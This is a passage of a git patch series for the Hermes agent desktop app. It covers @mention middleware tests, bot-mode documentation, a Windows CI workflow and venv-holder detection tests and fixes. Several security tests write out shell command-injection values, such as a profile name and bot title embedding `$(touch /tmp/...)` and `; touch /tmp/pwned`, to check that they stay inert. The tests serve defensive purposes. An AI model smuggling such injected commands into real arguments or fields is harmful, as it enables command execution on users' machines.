runHandoffCommand(result.text) - assert.equal(args[args.indexOf('-p') + 1], 'ops') - assert.equal( - args[args.indexOf('-q') + 1], - `Message from \uD83E\uDD16 ${title} (@research): ` - ) - assert.equal(existsSync(quoteSentinel), false) - assert.equal(existsSync(subSentinel), false) -}) - -test('security: a hostile active profile name stays literal in the handoff command', async () => { - const sentinel = `/tmp/hbmmention${process.pid}` - rmSync(sentinel, { force: true }) - const activeProfile = `res$(touch ${sentinel})earch` - - const { handler } = load({ activeProfile, title: null }) - const result = await handler({ text: 'ask @ops to summarize' }) - - const args = runHandoffCommand(result.text) - // displayName title-cases word boundaries inside the name — the shell - // metacharacters survive that transform, so they must arrive escaped. - assert.equal( - args[args.indexOf('-q') + 1], - `Message from \uD83E\uDD16 Res$(Touch /Tmp/Hbmmention${process.pid})Earch (@${activeProfile}): ` - ) - assert.equal(existsSync(sentinel), false) -}) - -test('regression: the handoff command quotes the recipient argument', async () => { - const { handler } = load() - const result = await handler({ text: 'ping @ops please' }) - assert.match(result.text, /`hermes -p 'ops' chat --in ~/) -}) - -test('behavior: a renamed default profile routes from another focused Bot Chat', async () => { - const { handler } = load({ - activeProfile: 'default', - focusedProfile: 'renametest', - profiles: [ - { name: 'default', display_name: 'Lucy' }, - { name: 'renametest' } - ] - }) - - const result = await handler({ text: 'ask @lucy for a status update' }) - - assert.match(result.text, /`hermes -p 'default' chat --in ~/) - assert.match(result.text, /Message from 🤖 Renametest \(@renametest\)/) -}) - -test('behavior: @dixie on a Connections bot stays in this chat and does not hermes -p', async () => { - const values = new Map() - const atom = initial => { - const slot = { get: () => values.get(slot), set: value => values.set(slot, value) } - values.set(slot, initial) - return slot - } - const delivered = [] - const context = { - atom, - PALETTE_AREA: 'palette', - COMPOSER_AREAS: { middleware: 'middleware' }, - queryClient: { - getQueryData: () => ({ - profiles: [ - { name: 'default', connectionId: 'local' }, - { - name: 'dixie', - connectionId: 'mac-mini', - connectionLabel: 'Mac Mini', - handle: 'dixie', - remoteSource: true - } - ] - }) - }, - document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }, - host: { - request: async () => ({ profiles: [{ name: 'default' }] }), - requestProfile: async (route, method) => { - delivered.push([route.connectionId, route.profile, method]) - return { session_id: 'remote-1' } - }, - state: { - profile: { get: () => 'default', listen: () => undefined }, - connectionId: { get: () => 'local', listen: () => undefined }, - gateway: { listen: () => undefined } - } - } - } - const source = pluginSource - .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '') - .replace(/^import .* from 'react'\r?\n/m, '') - .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '') - .replace('export default {', 'globalThis.plugin = {') - .concat('\nglobalThis.__mention = { $botMeta };\n') - vm.runInNewContext(source, context, { filename: 'plugin.js' }) - context.__mention.$botMeta.set({}) - - const registered = [] - context.plugin.register({ storage: { get: () => null }, register: entry => registered.push(entry) }) - const middleware = registered.find(entry => entry.id === 'mention-middleware') - const result = await middleware.data.handler({ text: '@dixie what is the disk space?' }) - - assert.match(result.text, /stay on this device/i) - assert.doesNotMatch(result.text, /hermes -p 'dixie'/) - await new Promise(resolve => setTimeout(resolve, 0)) - assert.equal(delivered[0][0], 'mac-mini') - assert.equal(delivered[0][1], 'dixie') -}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/mention-identification.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/mention-identification.test.mjs new file mode 100644 index 0000000000..f3baf15964 --- /dev/null +++ b/apps/desktop/src/plugins/hermes-bots/tests/mention-identification.test.mjs @@ -0,0 +1,155 @@ +import assert from 'node:assert/strict' +import { readFileSync } from 'node:fs' +import test from 'node:test' +import vm from 'node:vm' + +// The @mention middleware is IDENTIFICATION-ONLY (Aug 2026 redesign): it +// resolves the user's @tags against the live roster and annotates the draft +// with who they refer to. It never delivers anything — the agent owns +// messaging via its Bot-Chat message_agent tool, so there is exactly one +// send path, no renderer-side shellout instructions, and no verbatim +// forwarding of the user's text (the class behind #91397/#91304/#91339). + +const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') + +function load({ + activeProfile = 'research', + focusedProfile = activeProfile, + profiles = ['research', 'ops'], + title = null, + unionProfiles = null, + requestProfileSpy = null +} = {}) { + const values = new Map() + const atom = initial => { + const slot = { get: () => values.get(slot), set: value => values.set(slot, value) } + values.set(slot, initial) + return slot + } + const context = { + atom, + PALETTE_AREA: 'palette', + COMPOSER_AREAS: { middleware: 'middleware' }, + document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }, + host: { + request: async method => { + if (method === 'profiles.list') { + return { + profiles: profiles.map(profile => + typeof profile === 'string' ? { name: profile } : profile + ) + } + } + return {} + }, + ...(requestProfileSpy ? { requestProfile: requestProfileSpy } : {}), + state: { + profile: { get: () => activeProfile, listen: () => undefined }, + focusedSessionProfile: { get: () => focusedProfile, listen: () => undefined }, + connectionId: { get: () => 'local', listen: () => undefined }, + gateway: { listen: () => undefined } + } + }, + ...(unionProfiles + ? { queryClient: { getQueryData: () => ({ profiles: unionProfiles }) } } + : {}) + } + const source = pluginSource + .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '') + .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '') + .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '') + .replace(/^import .* from 'react'\r?\n/m, '') + .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '') + .replace('export default {', 'globalThis.plugin = {') + .concat('\nglobalThis.__mention = { $botMeta };\n') + vm.runInNewContext(source, context, { filename: 'plugin.js' }) + context.__mention.$botMeta.set(title ? { [activeProfile]: { title } } : {}) + + const registered = [] + context.plugin.register({ storage: { get: () => null }, register: entry => registered.push(entry) }) + const middleware = registered.find(entry => entry.id === 'mention-middleware') + assert.ok(middleware, 'mention middleware did not register') + return { handler: middleware.data.handler } +} + +test('identification: a local mention annotates who the user means', async () => { + const { handler } = load() + const result = await handler({ text: 'please @ops review the diff' }) + assert.match(result.text, /@mentions resolved from the Bot Mode roster/) + assert.match(result.text, /@ops = agent profile "ops"/) + assert.match(result.text, /message_agent/) +}) + +test('containment: the note never teaches a shellout and never forwards a command', async () => { + const { handler } = load() + const result = await handler({ text: 'ask @ops to summarize' }) + assert.doesNotMatch(result.text, /hermes -p/) + assert.doesNotMatch(result.text, /terminal call/i) + assert.doesNotMatch(result.text, /background=true/) +}) + +test('containment: the note tells the agent to compose, never forward verbatim', async () => { + const { handler } = load() + const result = await handler({ text: '@ops handle this' }) + assert.match(result.text, /compose your own message/i) + assert.match(result.text, /never forward/i) +}) + +test('security: a poisoned bot title stays inert prose (no shell context exists)', async () => { + const title = 'Evil" ; touch /tmp/pwned ; echo "$(touch /tmp/pwned2)"' + const { handler } = load({ + activeProfile: 'ops', + focusedProfile: 'ops', + profiles: [{ name: 'ops' }, { name: 'research', display_name: title }] + }) + const result = await handler({ text: 'ping @research please' }) + // The note is plain prose fed to the model — there is no command to break + // out of. The only invariant left: no hermes command is ever emitted. + assert.doesNotMatch(result.text, /`hermes/) +}) + +test('remote mentions: identified with their device, never delivered by the renderer', async () => { + const delivered = [] + const { handler } = load({ + activeProfile: 'default', + focusedProfile: 'default', + unionProfiles: [ + { name: 'default', connectionId: 'local' }, + { + name: 'dixie', + connectionId: 'mac-mini', + connectionLabel: 'Mac Mini', + handle: 'dixie', + remoteSource: true + } + ], + requestProfileSpy: async (...args) => { + delivered.push(args) + return {} + } + }) + + const result = await handler({ text: '@dixie what is the disk space?' }) + assert.match(result.text, /@dixie = agent profile "dixie"/) + assert.match(result.text, /on Mac Mini/) + // The renderer must NOT deliver: no requestProfile traffic at all. + await new Promise(resolve => setTimeout(resolve, 50)) + assert.equal(delivered.length, 0, 'middleware must never deliver over Connections') +}) + +test('unknown @ and emails pass through untouched', async () => { + const { handler } = load() + const untouched = 'mail user@example.com and ping @nosuchbot' + const result = await handler({ text: untouched }) + assert.equal(result.text, untouched) +}) + +test('source contract: the delivery machinery is gone from plugin.js', () => { + assert.doesNotMatch(pluginSource, /deliverRemoteRosterMentions/) + assert.doesNotMatch(pluginSource, /pollRemoteDmReply/) + assert.doesNotMatch(pluginSource, /ensureRemoteCanonicalChat/) + assert.doesNotMatch(pluginSource, /REMOTE_DM_TIMEOUT_MS/) + // The middleware must not know how to build a bot-to-bot hermes command. + assert.doesNotMatch(pluginSource, /\[@mention handoff/) + assert.doesNotMatch(pluginSource, /Desktop is delivering/) +}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/mention-roster-cache-key.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/mention-roster-cache-key.test.mjs index 38898848e4..b76bd18e88 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/mention-roster-cache-key.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/mention-roster-cache-key.test.mjs @@ -186,19 +186,17 @@ test('mention completions offer remote @name-device handles from the suffixed ca assert.ok(inserts.includes('@default-vera'), `expected @default-vera in ${JSON.stringify(inserts)}`) }) -test('the middleware resolves a remote @name-device mention and routes delivery over Connections', async () => { +test('the middleware identifies a remote @name-device mention without delivering (identification-only)', async () => { const { handler, delivered } = load() const result = await handler({ text: '@default-vera what is the disk space on the server?' }) - assert.match(result.text, /stay on this device/i) + assert.match(result.text, /@mentions resolved from the Bot Mode roster/) assert.match(result.text, /@default-vera/) - // No local CLI handoff is composed for remote bots — only the note's - // "do not run hermes -p" instruction must mention the phrase. + // No CLI handoff is composed and the renderer performs NO delivery — the + // agent owns messaging via its message_agent tool. assert.doesNotMatch(result.text, /hermes -p '?default/) await new Promise(resolve => setTimeout(resolve, 0)) - assert.ok(delivered.length > 0, 'remote delivery dispatched') - assert.equal(delivered[0][0], 'vera') - assert.equal(delivered[0][1], 'default') + assert.equal(delivered.length, 0, 'middleware must not deliver over Connections') }) test('a roster cached under another connection id still resolves (fallback entry)', () => { diff --git a/apps/desktop/src/plugins/hermes-bots/tests/remote-dm-delivery.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/remote-dm-delivery.test.mjs deleted file mode 100644 index d864d637ce..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/remote-dm-delivery.test.mjs +++ /dev/null @@ -1,134 +0,0 @@ -import assert from 'node:assert/strict' -import { readFileSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -// Cross-machine bot DMs: a remote @mention must land in the recipient's -// CANONICAL Bot Chat (pinned id → title → create, never a fresh session per -// mention), carry the "Message from 🤖 (@handle):" attribution -// prefix so the recipient's messaging protocol recognizes an agent-to-agent -// message, and poll for the reply so it can be relayed back. - -const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -function runtime(hostOverrides = {}) { - const context = { - console, - setTimeout: fn => { - fn() - return 0 - }, - clearTimeout: () => undefined, - Date, - URL, - atom: initial => { - let value = initial - return { get: () => value, set: next => (value = next), listen: () => () => undefined } - }, - host: { - request: async () => ({}), - requestProfile: async () => ({}), - notify: () => undefined, - notifyError: () => undefined, - state: { - profile: { get: () => 'default', listen: () => undefined }, - connectionId: { get: () => 'local', listen: () => undefined }, - gateway: { listen: () => undefined } - }, - ...hostOverrides - }, - document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } } - } - const code = pluginSource - .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '') - .replace(/^import .* from 'react'\r?\n/m, '') - .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '') - .replace('export default {', 'globalThis.plugin = {') - .concat('\nglobalThis.__dm = { deliverRemoteRosterMentions, ensureRemoteCanonicalChat };\n') - vm.runInNewContext(code, context, { filename: 'plugin.js' }) - return context -} - -test('remote DM resumes the pinned canonical Bot Chat instead of creating a new session', async () => { - const calls = [] - const ctx = runtime({ - requestProfile: async (route, method, params) => { - calls.push([method, params]) - - if (method === 'profiles.list') { - return { profiles: [{ name: 'dixie', ui_meta: { 'hermes-bots': { chat: 'stored-42' } } }] } - } - - if (method === 'session.resume' && params.session_id === 'stored-42') { - return { session_id: 'runtime-9', session_key: 'stored-42', messages: [] } - } - - if (method === 'session.resume') { - return { session_id: 'runtime-9', messages: [{ role: 'assistant', content: 'done' }], inflight: false, running: false } - } - - return {} - } - }) - - const { runtime: rt, stored } = await ctx.__dm.ensureRemoteCanonicalChat( - { connectionId: 'mac-mini', mode: 'remote', profile: 'dixie', targetProfile: 'dixie' }, - 'dixie' - ) - - assert.equal(rt, 'runtime-9') - assert.equal(stored, 'stored-42') - assert.ok(!calls.some(([method]) => method === 'session.create'), 'must not mint a fresh session when the pin resumes') -}) - -test('remote DM carries sender attribution and relays the reply', async () => { - const submits = [] - const notices = [] - const ctx = runtime({ - requestProfile: async (route, method, params) => { - if (method === 'profiles.list') { - return { profiles: [] } - } - - if (method === 'session.resume' && params.session_id === 'Bot Chat' && params.omit_messages) { - return { session_id: 'runtime-1', session_key: 'stored-1' } - } - - if (method === 'prompt.submit') { - submits.push(params.text) - return {} - } - - if (method === 'session.resume') { - // First (baseline) read: empty. After submit: reply present. - return submits.length - ? { messages: [{ role: 'user', content: 'x' }, { role: 'assistant', content: 'disk is 40% full' }], inflight: false, running: false } - : { messages: [] } - } - - return {} - }, - notify: notice => notices.push(notice) - }) - - await ctx.__dm.deliverRemoteRosterMentions( - [{ name: 'dixie', connectionId: 'mac-mini', connectionLabel: 'Mac Mini', remoteSource: true }], - 'what is the disk space?', - { name: 'Hermes', handle: 'hermes' } - ) - - assert.equal(submits.length, 1) - assert.match(submits[0], /^Message from 🤖 Hermes \(@hermes\): what is the disk space\?$/u) - assert.ok( - notices.some(notice => /disk is 40% full/.test(notice?.message || '')), - 'the recipient reply must be relayed back as a notification' - ) -}) - -test('source contract: DM poll shares the group-turn shape (bounded, new-assistant-message)', () => { - assert.match(pluginSource, /const REMOTE_DM_TIMEOUT_MS = /) - assert.match(pluginSource, /pollRemoteDmReply/) - assert.match(pluginSource, /Message from \\u\{1F916\} \$\{senderName\} \(@\$\{senderHandle\}\)/) -}) diff --git a/website/docs/user-guide/bot-mode.md b/website/docs/user-guide/bot-mode.md index bd9632dede..8a9eb0c9a7 100644 --- a/website/docs/user-guide/bot-mode.md +++ b/website/docs/user-guide/bot-mode.md @@ -94,9 +94,8 @@ Groups are standalone rows in the same activity-ordered roster as Bot DMs. A Bot Bots message each other with attribution, and you can hand work off from any chat: -- **@mentions** — type `@researcher have a look at this` in any chat and the active Bot hands the message off, waits for the reply, and reports back. Mention names are validated against the live roster, so an email address or an unknown `@` passes through untouched. +- **@mentions** — type `@researcher have a look at this` in any chat and the composer's `@` autocomplete helps you pick the right Bot; on send, the mention is resolved against the live roster and the active Bot is told exactly who you mean (profile, friendly name, and device for cross-connection Bots). The Bot then composes its own message and sends it with `message_agent` — your text is never forwarded verbatim, and the reply comes back attributed to that agent. An email address or an unknown `@` passes through untouched. Reaching a Bot on another machine goes through a registered peer gateway (see `hermes peer` below). - **Renamed Bots keep their tags in sync** — give a Bot a friendly name (the pencil in its chat header, or `hermes profile rename`) and it becomes taggable by that name: a Bot titled *Research Buddy* answers to `@research-buddy` (and `@researchbuddy`), in regular chats and in group rooms alike. The composer's `@` autocomplete offers the renamed tag and also matches when you type the old profile name, which keeps resolving too. -- **@mentions across machines** — mentioning a Bot that lives on another registered connection (use its `@name-device` handle when names collide) delivers over the Connections registry in the background: the active Bot stays on this device, the desktop routes the message to the recipient's machine, and the reply is relayed back attributed to that agent. Your window's gateway never switches. - **Direct messages** — every Bot Chat carries the `message_agent` tool: a Bot messages a teammate by calling `message_agent(target="researcher", message="…")`. The tool validates the target against the live roster, prefixes the sender's `Message from 🤖 (@):` attribution automatically, and delivers into the teammate's canonical Bot Chat. Delivery is **fire-and-forget**: the sender gets an acknowledgement, finishes its turn, and the reply arrives later as a background completion notification. The message travels as a real parameter (nothing shell-interpreted — quotes, `$(...)`, and backticks arrive verbatim), and the Bot composes its own message rather than forwarding your words. The teammate roster — names **and roles** from each profile's title/description — is part of every Bot Chat's system prompt, so Bots know who does what before choosing a recipient. The tool exists **only** in canonical Bot Chat sessions on Bot-Mode-managed installs; regular chats, group-room member sessions, and CLI sessions never see it. The backend teaches each Bot's canonical Bot Chat session the messaging protocol automatically at prompt-build time — including when a teammate opens it headlessly from the CLI. Only the canonical Bot Chat gets the protocol section; your regular sessions and your SOUL.md stay untouched. This is controlled by `agent.bot_mode_protocol` in `config.yaml` (default: on): From f9aed7d7f6904620414a5878cfa1eec0727d3bae Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:00:27 -0700 Subject: [PATCH 097/161] test(windows): on-demand live venv-holder E2E lane + probe suite (#91277) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit On-demand workflow (fires only on wine2e/** pushes, never on PRs/main) that runs a live venv-holder E2E on windows-latest: real spawned processes with Hermes argv shapes, real detection/classification/ message code against the live process table. Tests pin CORRECT behavior for the cluster issues (#90778 mislabeling, #78089 long-path exemption, #87594 ancestor-exclusion, #81774 serve premise), so unfixed bugs fail on the runner — empirical premise-check before the consolidation fix. --- .github/workflows/windows-venv-e2e.yml | 61 +++++ .../test_venv_holder_windows_live.py | 236 ++++++++++++++++++ 2 files changed, 297 insertions(+) create mode 100644 .github/workflows/windows-venv-e2e.yml create mode 100644 tests/hermes_cli/test_venv_holder_windows_live.py diff --git a/.github/workflows/windows-venv-e2e.yml b/.github/workflows/windows-venv-e2e.yml new file mode 100644 index 0000000000..d747402a10 --- /dev/null +++ b/.github/workflows/windows-venv-e2e.yml @@ -0,0 +1,61 @@ +name: Windows venv-holder live E2E + +# ON-DEMAND ONLY (fleet-update #91277, venv-holder consolidation work). +# +# Runs the live venv-holder E2E suite on a real windows-latest runner: +# spawns actual processes with realistic Hermes argv shapes and drives the +# REAL detection/classification/exemption code against the live process +# table — the coverage that cannot exist on the Linux lanes and that the +# maintainer cannot exercise locally before the work reaches main. +# +# Deliberately NOT wired to pull_request/main: it fires only on pushes to +# wine2e/** working branches, so it costs nothing on normal PRs. Delete or +# keep dormant after the venv-holder work lands. + +on: + push: + branches: + - "wine2e/**" + +permissions: + contents: read + +concurrency: + group: windows-venv-e2e-${{ github.ref }} + cancel-in-progress: true + +jobs: + venv-holder-e2e: + name: venv-holder live E2E (windows-latest) + runs-on: windows-latest + timeout-minutes: 25 + steps: + - name: Checkout code + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Install uv + uses: astral-sh/setup-uv@fac544c07dec837d0ccb6301d7b5580bf5edae39 # 8.2.0 + with: + version: "0.9.28" + enable-cache: true + cache-dependency-glob: | + pyproject.toml + uv.lock + + - name: Set up Python 3.11 + uses: ./.github/actions/retry + with: + command: uv python install 3.11 + + - name: Install dependencies + uses: ./.github/actions/retry + with: + command: uv sync --locked --python 3.11 --extra dev + + - name: Run venv-holder live E2E + shell: bash + run: | + set -uo pipefail + uv run --no-sync python -m pytest \ + tests/hermes_cli/test_venv_holder_windows_live.py \ + -o addopts= -v --timeout=300 -p no:cacheprovider diff --git a/tests/hermes_cli/test_venv_holder_windows_live.py b/tests/hermes_cli/test_venv_holder_windows_live.py new file mode 100644 index 0000000000..0c9de6f152 --- /dev/null +++ b/tests/hermes_cli/test_venv_holder_windows_live.py @@ -0,0 +1,236 @@ +"""LIVE Windows E2E for the venv-holder preflight (fleet-update #91277). + +Runs ONLY on a real Windows host (the on-demand ``windows-venv-e2e.yml`` +lane). Spawns REAL processes with realistic Hermes argv shapes and drives +the actual detection / classification / exemption code against the live +process table — no mocked psutil, no faked cmdlines. + +Each test documents which cluster issue it probes. Tests written BEFORE +the consolidation fix intentionally pin the CORRECT behavior, so on +unfixed main the buggy ones fail — that failure on the Windows runner is +the empirical premise-check for each issue: + + #90778 — holder message mislabels `hermes dashboard` as the Desktop + backend, and matches subcommands by substring ("--preserve" + contains "serve"). + #78089 — pausable-gateway exemption vs. long managed-runtime + interpreter paths (claimed fixed on main; verified here). + #87594 — ancestor-exclusion hides the gateway from the scan when the + updater is spawned BY the gateway (/update path). + #81774 — serve backends have no pause path (documented behavior probe). +""" + +from __future__ import annotations + +import os +import subprocess +import sys +import time +from pathlib import Path + +import pytest + +pytestmark = pytest.mark.skipif( + sys.platform != "win32", reason="live Windows venv-holder E2E" +) + +PROJECT_ROOT = Path(__file__).resolve().parents[2] + + +def _spawn(args: list[str], cwd: Path | None = None) -> subprocess.Popen: + """Spawn a real sleeper process whose argv carries the given tail. + + ``python -c "sleep" `` — the tail is inert data to the child + but fully visible to psutil cmdline scans, which is what the detection + code classifies on. + """ + proc = subprocess.Popen( + [sys.executable, "-c", "import time; time.sleep(300)", *args], + cwd=str(cwd or PROJECT_ROOT), + stdout=subprocess.DEVNULL, + stderr=subprocess.DEVNULL, + ) + time.sleep(0.8) # let the process table settle + assert proc.poll() is None, "sleeper died at spawn" + return proc + + +def _detect() -> list[tuple[int, str, str]]: + from hermes_cli.update_cmd import _detect_venv_python_processes + + return _detect_venv_python_processes() + + +def _kill(*procs: subprocess.Popen) -> None: + for proc in procs: + try: + proc.kill() + proc.wait(timeout=10) + except Exception: + pass + + +class TestDetection: + def test_detects_hermes_argv_process(self): + """Baseline: a live process running `-m hermes_cli.main serve` with + cwd under the install root is detected as a venv holder.""" + proc = _spawn(["-m", "hermes_cli.main", "serve"]) + try: + matches = _detect() + pids = [pid for pid, _, _ in matches] + assert proc.pid in pids, f"holder scan missed live process: {matches}" + cmdline = next(c for p, _, c in matches if p == proc.pid) + # Full cmdline, not a 120-char prefix (#78089 regression guard). + assert "hermes_cli.main" in cmdline + finally: + _kill(proc) + + def test_foreign_python_not_detected(self): + """A python process with no Hermes argv and cwd OUTSIDE the install + must not be reported as a holder.""" + import tempfile + + outside = Path(tempfile.mkdtemp()) + proc = _spawn(["totally", "unrelated"], cwd=outside) + try: + pids = [pid for pid, _, _ in _detect()] + assert proc.pid not in pids + finally: + _kill(proc) + + def test_long_runtime_path_gateway_detected_with_full_argv(self): + """#78089: a gateway launched via a long managed-runtime interpreter + path must surface with its FULL argv so the pausable exemption can + see `gateway run` past the 120-char mark.""" + # Pad the argv front so `gateway run` sits beyond 120 chars. + padding = os.path.join("C:\\", "Users", "x" * 90, ".hermes-runtime") + proc = _spawn([padding, "-m", "hermes_cli.main", "gateway", "run"]) + try: + matches = _detect() + cmdline = next((c for p, _, c in matches if p == proc.pid), None) + assert cmdline is not None, "long-path gateway missed by scan" + assert "gateway run" in cmdline.lower(), ( + f"argv truncated before `gateway run`: {cmdline!r}" + ) + finally: + _kill(proc) + + +class TestClassification: + def test_pausable_exemption_sees_long_path_gateway(self): + """#78089 follow-through: `_leftover_pausable_gateway_pids` must + classify the long-path gateway as pausable (not None).""" + from hermes_cli.update_cmd import _leftover_pausable_gateway_pids + + padding = os.path.join("C:\\", "Users", "y" * 90, ".hermes-runtime") + proc = _spawn([padding, "-m", "hermes_cli.main", "gateway", "run"]) + try: + matches = [m for m in _detect() if m[0] == proc.pid] + assert matches, "gateway not detected" + pids = _leftover_pausable_gateway_pids(matches) + assert pids == [proc.pid], ( + f"pausable exemption failed for long-path gateway: {pids}" + ) + finally: + _kill(proc) + + def test_serve_backend_not_classified_pausable(self): + """#81774 premise probe: a serve backend is NOT pausable today — + pinning current behavior so the consolidation change is visible.""" + from hermes_cli.update_cmd import _leftover_pausable_gateway_pids + + proc = _spawn(["-m", "hermes_cli.main", "serve"]) + try: + matches = [m for m in _detect() if m[0] == proc.pid] + assert matches, "serve backend not detected" + assert _leftover_pausable_gateway_pids(matches) is None + finally: + _kill(proc) + + +class TestHolderMessage: + """#90778 — the refusal message must name holders accurately.""" + + def test_dashboard_not_labeled_desktop_backend(self): + from hermes_cli.update_cmd import _format_venv_python_holders_message + + proc = _spawn(["-m", "hermes_cli.main", "dashboard"]) + try: + matches = [m for m in _detect() if m[0] == proc.pid] + assert matches, "dashboard process not detected" + message = _format_venv_python_holders_message(matches) + assert "close the desktop app" not in message.lower(), ( + "standalone `hermes dashboard` mislabeled as the Desktop " + f"backend (#90778):\n{message}" + ) + finally: + _kill(proc) + + def test_substring_subcommand_not_mislabeled(self): + """`--preserve-cache` contains 'serve'; the classifier must not + label an unrelated subcommand as the Desktop backend (#90778).""" + from hermes_cli.update_cmd import _format_venv_python_holders_message + + proc = _spawn(["-m", "hermes_cli.main", "kanban", "--preserve-cache"]) + try: + matches = [m for m in _detect() if m[0] == proc.pid] + assert matches, "kanban process not detected" + message = _format_venv_python_holders_message(matches) + assert "close the desktop app" not in message.lower(), ( + f"substring match mislabeled `--preserve-cache` (#90778):\n{message}" + ) + finally: + _kill(proc) + + +class TestAncestorExclusion: + """#87594 — when the updater is a CHILD of the gateway (/update path), + ancestor-exclusion must not hide the gateway from the scan entirely: + the gateway must still be visible to the pause machinery.""" + + def test_gateway_parent_visible_to_child_scan(self): + # Simulate the /update topology: parent (fake gateway) spawns a + # child python that runs the REAL detection and reports whether it + # can see its gateway parent. + child_code = ( + "import json, sys\n" + f"sys.path.insert(0, {str(PROJECT_ROOT)!r})\n" + "from hermes_cli.update_cmd import _detect_venv_python_processes\n" + "import os\n" + "matches = _detect_venv_python_processes()\n" + "print(json.dumps({'ppid': os.getppid(), 'pids': [p for p, _, _ in matches]}))\n" + ) + parent_code = ( + "import subprocess, sys\n" + f"out = subprocess.run([sys.executable, '-c', {child_code!r}]," + " capture_output=True, text=True, cwd=" + repr(str(PROJECT_ROOT)) + ")\n" + "print(out.stdout.strip())\n" + ) + # The parent's argv carries `gateway run` so it IS a gateway to any + # cmdline classifier; it runs the child synchronously. + result = subprocess.run( + [ + sys.executable, + "-c", + parent_code, + "-m", + "hermes_cli.main", + "gateway", + "run", + ], + capture_output=True, + text=True, + cwd=str(PROJECT_ROOT), + timeout=120, + ) + import json + + line = result.stdout.strip().splitlines()[-1] if result.stdout.strip() else "{}" + payload = json.loads(line) + assert payload, f"child scan produced no output: {result.stderr[-500:]}" + # The gateway parent must be visible to the scan so the pause + # machinery can stop it (#87594). Plain ancestor-exclusion hides it. + assert payload["ppid"] in payload["pids"], ( + "gateway ancestor invisible to venv scan — /update from the " + f"gateway can never pause it (#87594): {payload}" + ) From aefcf4d10a8533bca8566cd06c4fb89c24f6c481 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:01:56 -0700 Subject: [PATCH 098/161] ci(windows-venv-e2e): drop --timeout (pytest-timeout not in dev-only sync) --- .github/workflows/windows-venv-e2e.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/windows-venv-e2e.yml b/.github/workflows/windows-venv-e2e.yml index d747402a10..89b3ebf56e 100644 --- a/.github/workflows/windows-venv-e2e.yml +++ b/.github/workflows/windows-venv-e2e.yml @@ -58,4 +58,4 @@ jobs: set -uo pipefail uv run --no-sync python -m pytest \ tests/hermes_cli/test_venv_holder_windows_live.py \ - -o addopts= -v --timeout=300 -p no:cacheprovider + -o addopts= -v -p no:cacheprovider From c02cac00ce4eed7cd860b74026fa9729e2752fcf Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:31:00 -0700 Subject: [PATCH 099/161] fix(update): venv-holder labels parse the real subcommand; gateway ancestors stay visible to the scan MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit #90778: _hermes_holder_subcommand() — token-based parse of the actual Hermes subcommand (profile selectors skipped, flags never matched), so 'hermes dashboard' stops being labeled as the Desktop backend and '--preserve-cache' stops matching 'serve'. Unknown argv gets no hint instead of a wrong one. #87594: ancestor-exclusion in _detect_venv_python_processes and _venv_launcher_ancestors now carves out GATEWAY ancestors (canonical looks_like_gateway_command_line): when /update runs as the gateway's child, the gateway stays visible to the scan so the pause machinery can stop it, while shells/terminals/own-venv ancestry stay excluded. 15 cross-platform classifier tests; live Windows E2E suite is the acceptance gate on this branch. --- hermes_cli/update_cmd.py | 101 ++++++++++++++++-- .../hermes_cli/test_venv_holder_classifier.py | 61 +++++++++++ 2 files changed, 155 insertions(+), 7 deletions(-) create mode 100644 tests/hermes_cli/test_venv_holder_classifier.py diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index 021b7656fe..4ad10d8d58 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -3683,8 +3683,28 @@ def _detect_venv_python_processes( skip: set[int] = set(exclude_pids or set()) skip.add(os.getpid()) + try: + from gateway.status import looks_like_gateway_command_line as _is_gw + except Exception: + _is_gw = None try: for anc in psutil.Process().parents(): + # #87594: do NOT blanket-exclude ancestors. When `/update` runs + # from a messaging platform the updater is a CHILD of the gateway + # — excluding all ancestors hides the gateway from the scan, so + # the pause machinery downstream never sees the one process it + # exists to stop, and the update dead-ends on `venv-blocked`. + # A GATEWAY ancestor stays visible (the pause path stops it + # gracefully; a detached child updater survives its parent's + # stop on Windows). Every other ancestor (shells, terminals, + # this CLI's own venv python chain) stays excluded — an updater + # must never nominate its own interactive ancestry as blockers. + try: + 